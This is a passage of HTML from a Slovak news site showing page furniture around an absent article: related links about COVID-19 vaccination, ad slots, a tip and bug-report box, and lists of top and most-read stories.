            </script>        <div class="cb"></div>
    </div>
</div>
        </div>        <div class="under-article mr-lg-20 mr-md-10"><div class="rs-advertisement rs-advertisement-cas-desktop-square">
  <div id='m_other1'>
    <script>
      googletag.cmd.push(function() { googletag.display('m_other1'); });
    </script>
  </div>
</div>    <div class="article-related-list mt-lg-20 mt-md-20 mt-sm-20 mt-xs-10 pt-lg-20 pt-md-20 pt-sm-20 pt-xs-10">    
		<span class="title cas-color-font pb-md-10 pb-sm-10 pb-xs-10 mt-xs-10">Súvisiace články:</span>
		<ul>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-1"  href="/clanok/2537111/izrael-posuva-vekovu-hranicu-ockovania-od-buduceho-tyzdna-budu-vitane-aj-deti-od-12-rokov/" title="Izrael posúva vekovú hranicu očkovania: Od budúceho týždňa budú vítané aj deti od 12 rokov">Izrael posúva vekovú hranicu očkovania: Od budúceho týždňa budú vítané aj deti od 12 rokov				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-2"  href="/clanok/2537147/vo-francuzsku-dostala-prvu-davku-vakciny-polovica-dospelych-coskoro-budu-na-rade-tinedzeri/" title="Vo Francúzsku dostala prvú dávku vakcíny polovica dospelých: Čoskoro budú na rade tínedžeri">Vo Francúzsku dostala prvú dávku vakcíny polovica dospelých: Čoskoro budú na rade tínedžeri				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-3"  href="/clanok/2535703/babis-oznamil-vyrazny-posun-v-podavani-vakcin-v-cesku-coskoro-zaockuju-aj-ludi-starsich-ako-16-rokov/" title="Babiš oznámil výrazný posun v podávaní vakcín: V Česku čoskoro zaočkujú aj ľudí starších ako 16 rokov">Babiš oznámil výrazný posun v podávaní vakcín: V Česku čoskoro zaočkujú aj ľudí starších ako 16 rokov				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-4"  href="/clanok/2535443/cesko-rozhodlo-o-prednostnom-ockovani-tehotnych-zien-hlavne-slovo-ma-mat-lekar/" title="Česko rozhodlo o prednostnom očkovaní tehotných žien: Hlavné slovo má mať lekár">Česko rozhodlo o prednostnom očkovaní tehotných žien: Hlavné slovo má mať lekár				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-5"  href="/clanok/2537969/medzinarodna-iniciativa-nema-dostatok-vakcin-rozvojove-krajiny-nebudu-zaockovane-vcas/" title="Medzinárodná iniciatíva nemá dostatok vakcín: Rozvojové krajiny nebudú zaočkované včas">Medzinárodná iniciatíva nemá dostatok vakcín: Rozvojové krajiny nebudú zaočkované včas				</a>
    		</li>        	<li>
        		<a  data-event="clanok|citajte-dalej-verzia-A|clanok-6"  href="/clanok/2535487/zmena-v-systeme-ockovania-urcitej-skupine-ludi-znova-povolili-prednostne-podanie-vakciny/" title="Zmena v systéme očkovania: Určitej skupine ľudí znova povolili prednostné podanie vakcíny">Zmena v systéme očkovania: Určitej skupine ľudí znova povolili prednostné podanie vakcíny				</a>
    		</li>        </ul>
	</div>
    <div class="cb"></div>
<div class="author-tip-error-bar">
	<div class="author">
		Autor: <span class="gray">TASR</span>
	</div>
	<div class="tip">
		<a data-event="|funkcne-prvky|mate-tip-pod-clankom" class="lg-visible" href="/tipredakcii/" title="Máte tip? Dajte nám vedieť.">
			<span class="cas-color-font font-pt-sans-bold">
				Máte tip?
			</span>
			Dajte nám vedieť
			<span class="underline">mailom</span>
			alebo na
			<span class="font-pt-sans-bold">0918 620 001</span>
		</a>
		<a data-event="|funkcne-prvky|mate-tip-pod-clankom" class="md-visible sm-visible" href="/tipredakcii/" title="Máte tip? Dajte nám vedieť.">
			<span class="cas-color-font font-pt-sans-bold">Máte tip?</span> Dajte nám vedieť
		</a>
		<a data-event="|funkcne-prvky|mate-tip-pod-clankom" class="xs-visible" href="/tipredakcii/" title="Máte tip?">
			<span class="cas-color-font font-pt-sans-bold">Máte tip?</span>
		</a>
	</div>
	<div class="bug" id="bug_button">
		<a data-event="|funkcne-prvky|nahlasit-chybu" class="report-bug-open" id="report_bug_open" href="javascript:void(0)" title="Nahlásiť chybu">
			Nahlásiť chybu
		</a>
	</div>
	<div class="cb"></div>
	<div class="report-bug" id="report_bug">
        <div style="text-align:center">
            <iframe src="https://kontakt.zoznam.sk/cas/media" class="xs-hidden" width="100%" height="850"></iframe>
        </div>
        <iframe src="https://kontakt.zoznam.sk/cas/media" class="lg-hidden xs-visible" width="320" height="850"></iframe>
        <script src="https://kontakt.zoznam.sk/static/js/iframeResizer.min.js"></script>
        <script>iFrameResize({ checkOrigin: [ "https://kontakt.zoznam.sk" ] }, document.querySelector("iframe[src=\"https://kontakt.zoznam.sk/cas/media\""));</script>

        <p>
           Vami zadan&#xE9; &#xFA;daje do kontaktn&#xE9;ho formul&#xE1;ra s&#xFA; sprac&#xFA;van&#xE9; spolo&#x10D;nos&#x165;ou FPD Media, a.s., so s&#xED;dlom Prievozsk&#xE1; 14, 821 09 Bratislava, I&#x10C;O: 47 237 601, zap&#xED;san&#xE1; v Obchodnom registri Okresn&#xE9;ho s&#xFA;du Bratislava I, v odd. Sa, vlo&#x17E;ka &#x10D;. 6882/B na &#xFA;&#x10D;ely sp&#xE4;tn&#xE9;ho kontaktovania. Pre&#x10D;&#xED;tajte si viac inform&#xE1;ci&#xED; k ochrane osobn&#xFD;ch &#xFA;dajov
           <a href="https://www.cas.sk/clanok/731794/zasady/" title="Zasady ochrany udajov" target="_blank"><strong>viac inform&#xE1;ci&#xED; k ochrane osobn&#xFD;ch &#xFA;dajov</strong></a>.
        </p>
    </div>
        <script>
            $("#bug_button").click(function(){
              $("report_bug").toggle();
            });
        </script>
</div>        </div>        <div class="article-bottom-lg lg-visible mr-lg-20">
            <div class="row bordered"><div class="rs-advertisement rs-advertisement-strossle-widget">
    <!-- Reklamna plocha strossle-widget -->
    <div class="strossle-widget"></div>
</div><br>
<br>
    
    <div class="top-articles">
        <div class="top-content-big-article cloneable hidden xs-visible"
            data-clone-target="#article-top_list-content-article-0"></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 hidden lg-visible md-visible sm-visible"
                id="article-top_list-content-article-1">
                <a class="article-image" href="/clanok/2537977/nigerijske-urady-ohlasili-ze-v-krajine-vypli-twitter-spravili-tak-pre-jediny-prispevok/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-1-obrazok"
                    title="Nigérijské úrady ohlásili, že v krajine vypli Twitter: Spravili tak pre jediný príspevok | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330449.jpg/icon-operating-system-photography-big-tech-new-communication-technology-sign-equipment-symbol-insignia-electrical-equipment-computer-monitor-internet-computer-social-media-wireless-technology-mobile-phone-smart-phone-portable-information-device-mobile-app-computer-software-twitter-digital-display-iphone-digital-tablet-online-messaging-touch-screen-liquid-crystal-display-electronic-organizer-apple-computers-computer-network-periscope-brand-name.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330449.jpg/icon-operating-system-photography-big-tech-new-communication-technology-sign-equipment-symbol-insignia-electrical-equipment-computer-monitor-internet-computer-social-media-wireless-technology-mobile-phone-smart-phone-portable-information-device-mobile-app-computer-software-twitter-digital-display-iphone-digital-tablet-online-messaging-touch-screen-liquid-crystal-display-electronic-organizer-apple-computers-computer-network-periscope-brand-name.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330449.jpg/icon-operating-system-photography-big-tech-new-communication-technology-sign-equipment-symbol-insignia-electrical-equipment-computer-monitor-internet-computer-social-media-wireless-technology-mobile-phone-smart-phone-portable-information-device-mobile-app-computer-software-twitter-digital-display-iphone-digital-tablet-online-messaging-touch-screen-liquid-crystal-display-electronic-organizer-apple-computers-computer-network-periscope-brand-name.jpg"
                        title="Nigérijské úrady ohlásili, že v krajine vypli Twitter: Spravili tak pre jediný príspevok | Nový Čas" alt=" Nigérijské úrady">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330449.jpg/icon-operating-system-photography-big-tech-new-communication-technology-sign-equipment-symbol-insignia-electrical-equipment-computer-monitor-internet-computer-social-media-wireless-technology-mobile-phone-smart-phone-portable-information-device-mobile-app-computer-software-twitter-digital-display-iphone-digital-tablet-online-messaging-touch-screen-liquid-crystal-display-electronic-organizer-apple-computers-computer-network-periscope-brand-name.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537977/nigerijske-urady-ohlasili-ze-v-krajine-vypli-twitter-spravili-tak-pre-jediny-prispevok/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-1-nadpis"
                            title="Nigérijské úrady ohlásili, že v krajine vypli Twitter: Spravili tak pre jediný príspevok">
                            <span class="hidden lg-visible md-visible sm-visible">Nigérijské úrady ohlásili, že v krajine vypli Twitter: Spravili tak pre jediný príspevok                            </span>
                            <span class="hidden xs-visible">Nigérijské úrady ohlásili, že v krajine vypli Twitter                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>
                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-2">
                <a class="article-image" href="/clanok/2537865/britania-chysta-najhlbsi-bazen-na-svete-za-175-milionov-eur-podmorsky-svet-v-50-metroch/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-2-obrazok"
                    title="Británia chystá najhlbší bazén na svete za 175 miliónov eur: Podmorský svet v 50 metroch | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330125.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330125.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330125.jpg"
                        title="Británia chystá najhlbší bazén na svete za 175 miliónov eur: Podmorský svet v 50 metroch | Nový Čas" alt=" Británia chystá">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330125.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags"><span class="flag">Foto</span>    </div>                        <a class="default-article-title" href="/clanok/2537865/britania-chysta-najhlbsi-bazen-na-svete-za-175-milionov-eur-podmorsky-svet-v-50-metroch/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-2-nadpis"
                            title="Británia chystá najhlbší bazén na svete za 175 miliónov eur: Podmorský svet v 50 metroch">
                            <span class="hidden lg-visible md-visible sm-visible">Británia chystá najhlbší bazén na svete za 175 miliónov eur: Podmorský svet v 50 metroch                            </span>
                            <span class="hidden xs-visible">Británia chystá najhlbší bazén na svete za 175 miliónov eur                            </span>
                        </a>
                    </div>
                </div>
            </div>               <div class="sm-clear"></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-3">
                <a class="article-image" href="/clanok/2537975/slovinske-organy-by-mali-zarucit-slobodu-prejavu-a-medii-komisarka-upozornila-na-hrozbu/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-3-obrazok"
                    title="Slovinské orgány by mali zaručiť slobodu prejavu a médií: Komisárka upozornila na hrozbu | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/1428413.jpg/rada-europy-komisarka-dunja-mijatovicova.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/1428413.jpg/rada-europy-komisarka-dunja-mijatovicova.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/1428413.jpg/rada-europy-komisarka-dunja-mijatovicova.jpg"
                        title="Slovinské orgány by mali zaručiť slobodu prejavu a médií: Komisárka upozornila na hrozbu | Nový Čas" alt=" Slovinské orgány">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/1428413.jpg/rada-europy-komisarka-dunja-mijatovicova.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537975/slovinske-organy-by-mali-zarucit-slobodu-prejavu-a-medii-komisarka-upozornila-na-hrozbu/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-3-nadpis"
                            title="Slovinské orgány by mali zaručiť slobodu prejavu a médií: Komisárka upozornila na hrozbu">
                            <span class="hidden lg-visible md-visible sm-visible">Slovinské orgány by mali zaručiť slobodu prejavu a médií: Komisárka upozornila na hrozbu                            </span>
                            <span class="hidden xs-visible">Slovinsko má zaručiť slobodu prejavu a médií                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class="md-clear lg-clear "></div>
                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-4">
                <a class="article-image" href="/clanok/2537969/medzinarodna-iniciativa-nema-dostatok-vakcin-rozvojove-krajiny-nebudu-zaockovane-vcas/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-4-obrazok"
                    title="Medzinárodná iniciatíva nemá dostatok vakcín: Rozvojové krajiny nebudú zaočkované včas | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330435.jpg/photography-virus-covid-19-people-professional-occupation-occupation-working-pandemic-illness-illness-medicine-epidemic-infectious-disease-healthcare-and-medicine-coronavirus-hospital-lifestyles-doctor-nurse-healthcare-worker-accidents-and-disasters-medical-clinic-intensive-care-unit-medical-occupation-state-of-emergency-female-doctor-biotechnology-koronavirus-ilustracne.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330435.jpg/photography-virus-covid-19-people-professional-occupation-occupation-working-pandemic-illness-illness-medicine-epidemic-infectious-disease-healthcare-and-medicine-coronavirus-hospital-lifestyles-doctor-nurse-healthcare-worker-accidents-and-disasters-medical-clinic-intensive-care-unit-medical-occupation-state-of-emergency-female-doctor-biotechnology-koronavirus-ilustracne.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330435.jpg/photography-virus-covid-19-people-professional-occupation-occupation-working-pandemic-illness-illness-medicine-epidemic-infectious-disease-healthcare-and-medicine-coronavirus-hospital-lifestyles-doctor-nurse-healthcare-worker-accidents-and-disasters-medical-clinic-intensive-care-unit-medical-occupation-state-of-emergency-female-doctor-biotechnology-koronavirus-ilustracne.jpg"
                        title="Medzinárodná iniciatíva nemá dostatok vakcín: Rozvojové krajiny nebudú zaočkované včas | Nový Čas" alt=" Medzinárodná iniciatíva">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330435.jpg/photography-virus-covid-19-people-professional-occupation-occupation-working-pandemic-illness-illness-medicine-epidemic-infectious-disease-healthcare-and-medicine-coronavirus-hospital-lifestyles-doctor-nurse-healthcare-worker-accidents-and-disasters-medical-clinic-intensive-care-unit-medical-occupation-state-of-emergency-female-doctor-biotechnology-koronavirus-ilustracne.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537969/medzinarodna-iniciativa-nema-dostatok-vakcin-rozvojove-krajiny-nebudu-zaockovane-vcas/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-4-nadpis"
                            title="Medzinárodná iniciatíva nemá dostatok vakcín: Rozvojové krajiny nebudú zaočkované včas">
                            <span class="hidden lg-visible md-visible sm-visible">Medzinárodná iniciatíva nemá dostatok vakcín: Rozvojové krajiny nebudú zaočkované včas                            </span>
                            <span class="hidden xs-visible">Medzinárodná iniciatíva nemá dostatok vakcín                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>
                <div class="sm-clear "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pr-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-5">
                <a class="article-image" href="/clanok/2537965/v-madarsku-doslo-k-hrozivej-zrazke-tragicka-dopravna-nehoda-si-vyziadala-tri-zivoty/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-5-obrazok"
                    title="V Maďarsku došlo k hrozivej zrážke: Tragická dopravná nehoda si vyžiadala tri životy | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330429.jpg/photography-ilustracne-auto-damaged-nehoda-car-car-accident-autonehoda-havaria-crash-tragedia-insurance-traffic-accident-kamion-zrazka-nakladiak-nakladne-auto-nestastie-bent-wreck-bumper-two-objects-dented-crash-test-pick-up-truck.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330429.jpg/photography-ilustracne-auto-damaged-nehoda-car-car-accident-autonehoda-havaria-crash-tragedia-insurance-traffic-accident-kamion-zrazka-nakladiak-nakladne-auto-nestastie-bent-wreck-bumper-two-objects-dented-crash-test-pick-up-truck.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330429.jpg/photography-ilustracne-auto-damaged-nehoda-car-car-accident-autonehoda-havaria-crash-tragedia-insurance-traffic-accident-kamion-zrazka-nakladiak-nakladne-auto-nestastie-bent-wreck-bumper-two-objects-dented-crash-test-pick-up-truck.jpg"
                        title="V Maďarsku došlo k hrozivej zrážke: Tragická dopravná nehoda si vyžiadala tri životy | Nový Čas" alt=" V Maďarsku">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330429.jpg/photography-ilustracne-auto-damaged-nehoda-car-car-accident-autonehoda-havaria-crash-tragedia-insurance-traffic-accident-kamion-zrazka-nakladiak-nakladne-auto-nestastie-bent-wreck-bumper-two-objects-dented-crash-test-pick-up-truck.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537965/v-madarsku-doslo-k-hrozivej-zrazke-tragicka-dopravna-nehoda-si-vyziadala-tri-zivoty/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-5-nadpis"
                            title="V Maďarsku došlo k hrozivej zrážke: Tragická dopravná nehoda si vyžiadala tri životy">
                            <span class="hidden lg-visible md-visible sm-visible">V Maďarsku došlo k hrozivej zrážke: Tragická dopravná nehoda si vyžiadala tri životy                            </span>
                            <span class="hidden xs-visible">V Maďarsku zomreli pri dopravnej nehode traja ľudia                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class=" "></div>            <div class="top-content-article col-lg-4 pr-lg-20 col-md-4 pr-md-10 col-sm-6 pl-sm-5 mt-lg-10 mt-md-10 col-xs-12 pt-xs-10"
                id="article-top_list-content-article-6">
                <a class="article-image" href="/clanok/2537967/sulik-a-korcok-rokovali-v-petrohrade-s-gazpromom-pozitivna-sprava-pre-slovensko/"
                    data-event="clanok|pod-clankom-top-6-verzia-A|clanok-6-obrazok"
                    title="Sulík a Korčok rokovali v Petrohrade s Gazpromom: Pozitívna správa pre Slovensko | Nový Čas">
                    <img class="lazy_load"
                        src="https://img.cas.sk/cas/320px-c1/3330433.jpg/sulik-korcok-grohling.jpg"
                        data-1024="https://img.cas.sk/cas/320px-c1/3330433.jpg/sulik-korcok-grohling.jpg"
                        data-1024x2="https://img.cas.sk/cas/640px-c1/3330433.jpg/sulik-korcok-grohling.jpg"
                        title="Sulík a Korčok rokovali v Petrohrade s Gazpromom: Pozitívna správa pre Slovensko | Nový Čas" alt=" Sulík a">
                        <noscript><img src="https://img.cas.sk/cas/320px-c1/3330433.jpg/sulik-korcok-grohling.jpg"></noscript>                </a>
                <div class="wrapper">
                    <div class="relative-wrapper">    <div class="flags">    </div>                        <a class="default-article-title" href="/clanok/2537967/sulik-a-korcok-rokovali-v-petrohrade-s-gazpromom-pozitivna-sprava-pre-slovensko/"
                            data-event="clanok|pod-clankom-top-6-verzia-A|clanok-6-nadpis"
                            title="Sulík a Korčok rokovali v Petrohrade s Gazpromom: Pozitívna správa pre Slovensko">
                            <span class="hidden lg-visible md-visible sm-visible">Sulík a Korčok rokovali v Petrohrade s Gazpromom: Pozitívna správa pre Slovensko                            </span>
                            <span class="hidden xs-visible">Sulík a Korčok rokovali s Gazpromom                            </span>
                        </a>
                    </div>
                </div>
            </div>                <div class="md-clear lg-clear"></div>
                <div class="sm-clear"></div>
                <div class="tiny-clear"></div>    </div>
<div class="rs-advertisement rs-advertisement-cas-desktop-ak-article"><!-- Reklamna plocha cas-desktop-ak-article --><div style="font-family: PT Sans Narrow,serif;font-weight: 700;font-size: 22px;color:#ed1c24 !important;text-align:left;margin-left:10px;width:100%;margin-top:20px;margin-bottom:10px;">Odpor&#xFA;&#x10D;ame z TIVI.sk</div>
<div style="max-width:100%;height:auto;position:relative;margin-left:10px"><script type="text/javascript" src="https://mr1a.exs.pl/widget/widget_playlist.php?widget=185"></script></div></div>
<!-- posunutie onnetwork boxu -->
<style>.onnetworkplayercontainer.miniature.desktop>.alwplayer, .onnetworkplayercontainer.mmpl1.miniature>.alwplayer {bottom: 90px !important}</style>             </div>
            <br>        </div>
    </article>
    <aside class="side-section"><div class="rs-advertisement rs-advertisement-cas-desktop-square">
    <!-- Reklamna plocha cas-desktop-square -->
    <div id='top2'>
        <script>
            googletag.cmd.push(function() { googletag.display('top2'); });
        </script>
    </div>
</div>	<div class="article-box article-box-most-read article-box-most-read-numbered switch-btn-identifier">

		<span class="subtitle cas-color-font uppercase">Najčítanejšie		</span>
			<div class="switch-btn">					<span class="switch-btn-option switch-btn-active" data-time="24h"
						onclick="ga('send','event',hp,'najcitanejsie',prepnutie-24hod);">24h</span>&nbsp;/&nbsp;					<span class="switch-btn-option " data-time="3d"
						onclick="ga('send','event',hp,'najcitanejsie',prepnutie-3dni);">3d</span>&nbsp;/&nbsp;					<span class="switch-btn-option " data-time="7d"
						onclick="ga('send','event',hp,'najcitanejsie',prepnutie-7dni);">7d</span>			</div>			<div class="switch-content 24h">        <div class="article-item article-item-first with-image">
            <div class="article-item-number  xs-hidden">1.</div>
            <a class="article-image hidden"
                href="/clanok/2537717/exmanzelia-na-pohrebe-virsika-56-flasikov-outfit-bol-neprehliadnutelny-benova-sa-topila-v-slzach/"
                title="Exmanželia na pohrebe Viršíka († 56): Flašíkov outfit bol neprehliadnuteľný, Beňová sa topila v slzách"
                data-event="hp|najcitanejsie|clanok-1">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3329819.jpg/pohreb-virsik.jpg"
                title="Exmanželia na pohrebe Viršíka († 56): Flašíkov outfit bol neprehliadnuteľný, Beňová sa topila v slzách | Nový Čas" alt="Exmanželia na"
                data-src="https://img.cas.sk/cas//320px-c1/3329819.jpg/pohreb-virsik.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3329819.jpg/pohreb-virsik.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3329819.jpg/pohreb-virsik.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3329819.jpg/pohreb-virsik.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-1"
            href="/clanok/2537717/exmanzelia-na-pohrebe-virsika-56-flasikov-outfit-bol-neprehliadnutelny-benova-sa-topila-v-slzach/"
            title="Exmanželia na pohrebe Viršíka († 56): Flašíkov outfit bol neprehliadnuteľný, Beňová sa topila v slzách"
            data-event="hp|najcitanejsie|clanok-1">
                <span class="hidden lg-visible md-visible sm-visible ">Exmanželia na pohrebe Viršíka († 56): Flašíkov outfit bol neprehliadnuteľný, Beňová sa topila v slzách</span>
        
                <span class="hidden xs-visible">Flašíkov outfit bol neprehliadnuteľný, Beňová sa topila v slzách</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">2.</div>
            <a class="article-image hidden"
                href="/clanok/2537477/janka-42-si-presla-po-zalahnuti-v-uchu-peklom-manzel-opisal-torturu-mozu-za-jej-smrt-zdravotnici/"
                title="Janka († 42) si prešla po zaľahnutí v uchu peklom: Manžel opísal tortúru, môžu za jej smrť zdravotníci?!"
                data-event="hp|najcitanejsie|clanok-2">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3329257.jpg/mama-janka-zosnula-zalahnute-ucho.jpg"
                title="Janka († 42) si prešla po zaľahnutí v uchu peklom: Manžel opísal tortúru, môžu za jej smrť zdravotníci?! | Nový Čas" alt="Janka (†"
                data-src="https://img.cas.sk/cas//320px-c1/3329257.jpg/mama-janka-zosnula-zalahnute-ucho.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3329257.jpg/mama-janka-zosnula-zalahnute-ucho.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3329257.jpg/mama-janka-zosnula-zalahnute-ucho.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3329257.jpg/mama-janka-zosnula-zalahnute-ucho.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-2"
            href="/clanok/2537477/janka-42-si-presla-po-zalahnuti-v-uchu-peklom-manzel-opisal-torturu-mozu-za-jej-smrt-zdravotnici/"
            title="Janka († 42) si prešla po zaľahnutí v uchu peklom: Manžel opísal tortúru, môžu za jej smrť zdravotníci?!"
            data-event="hp|najcitanejsie|clanok-2">
                <span class="hidden lg-visible md-visible sm-visible ">Janka († 42) si prešla po zaľahnutí v uchu peklom: Manžel opísal tortúru, môžu za jej smrť zdravotníci?!</span>
        
                <span class="hidden xs-visible">Janka († 42) z Čičmian si prešla po zaľahnutí v uchu peklom</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">3.</div>
            <a class="article-image hidden"
                href="/clanok/2537613/pohreb-jula-virsika-56-zname-tvare-v-slzach-smutocny-prejav-kamarata-trhal-srdce/"
                title="Pohreb Jula Viršíka († 56): Známe tváre v slzách, smútočný prejav kamaráta trhal srdce"
                data-event="hp|najcitanejsie|clanok-3">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3329713.jpg/pohreb-virsik.jpg"
                title="Pohreb Jula Viršíka († 56): Známe tváre v slzách, smútočný prejav kamaráta trhal srdce | Nový Čas" alt="Pohreb Jula"
                data-src="https://img.cas.sk/cas//320px-c1/3329713.jpg/pohreb-virsik.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3329713.jpg/pohreb-virsik.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3329713.jpg/pohreb-virsik.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3329713.jpg/pohreb-virsik.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-3"
            href="/clanok/2537613/pohreb-jula-virsika-56-zname-tvare-v-slzach-smutocny-prejav-kamarata-trhal-srdce/"
            title="Pohreb Jula Viršíka († 56): Známe tváre v slzách, smútočný prejav kamaráta trhal srdce"
            data-event="hp|najcitanejsie|clanok-3">
                <span class="hidden lg-visible md-visible sm-visible ">Pohreb Jula Viršíka († 56): Známe tváre v slzách, smútočný prejav kamaráta trhal srdce</span>
        
                <span class="hidden xs-visible">Pohreb Viršíka († 56): Dav pred krematóriom, známe tváre v slzách</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">4.</div>
            <a class="article-image hidden"
                href="/clanok/2537039/jelenec-prisiel-o-oblubeneho-starostu-ivana-vargu-41-zomrel-hrdina-tragedie-na-ceste-smrti/"
                title="Jelenec prišiel o obľúbeného starostu Ivana Vargu († 41): Zomrel hrdina tragédie na ceste smrti"
                data-event="hp|najcitanejsie|clanok-4">
                
            <img class="lazy_load"
                src="https://img.cas.sk/cas//320px-c1/3328391.jpg/smrt-spomienky-nitra-smutok-pomoc-havaria-obec-starosta-autobus-jelenec-ivan-varga.jpg"
                title="Jelenec prišiel o obľúbeného starostu Ivana Vargu († 41): Zomrel hrdina tragédie na ceste smrti | Nový Čas" alt="Jelenec prišiel"
                data-src="https://img.cas.sk/cas//320px-c1/3328391.jpg/smrt-spomienky-nitra-smutok-pomoc-havaria-obec-starosta-autobus-jelenec-ivan-varga.jpg"
                data-1024="https://img.cas.sk/cas//320px-c1/3328391.jpg/smrt-spomienky-nitra-smutok-pomoc-havaria-obec-starosta-autobus-jelenec-ivan-varga.jpg"
                data-1024x2="https://img.cas.sk/cas//640px-c1/3328391.jpg/smrt-spomienky-nitra-smutok-pomoc-havaria-obec-starosta-autobus-jelenec-ivan-varga.jpg"
                style="display: none;">

                <noscript><img src="https://img.cas.sk/cas//320px-c1/3328391.jpg/smrt-spomienky-nitra-smutok-pomoc-havaria-obec-starosta-autobus-jelenec-ivan-varga.jpg"></noscript>
            </a>
            <a data-event="hp|najcitanejsie|clanok-4"
            href="/clanok/2537039/jelenec-prisiel-o-oblubeneho-starostu-ivana-vargu-41-zomrel-hrdina-tragedie-na-ceste-smrti/"
            title="Jelenec prišiel o obľúbeného starostu Ivana Vargu († 41): Zomrel hrdina tragédie na ceste smrti"
            data-event="hp|najcitanejsie|clanok-4">
                <span class="hidden lg-visible md-visible sm-visible ">Jelenec prišiel o obľúbeného starostu Ivana Vargu († 41): Zomrel hrdina tragédie na ceste smrti</span>
        
                <span class="hidden xs-visible">Jelenec prišiel o starostu Ivana Vargu († 41)</span>
        
            </a>
            <div class="tiny-clear"></div>
        </div>
        <div class="article-item  with-image">
            <div class="article-item-number  xs-hidden">5.</div>
            <a class="article-image hidden"
                href="/clanok/2537109/prehovorila-svedkyna-tragedie-pri-ktorej-vlak-zrazil-lauru-13-a-lindu-13-srdcervuca-rozlucka-mamy-jedneho-z-dievcat/"
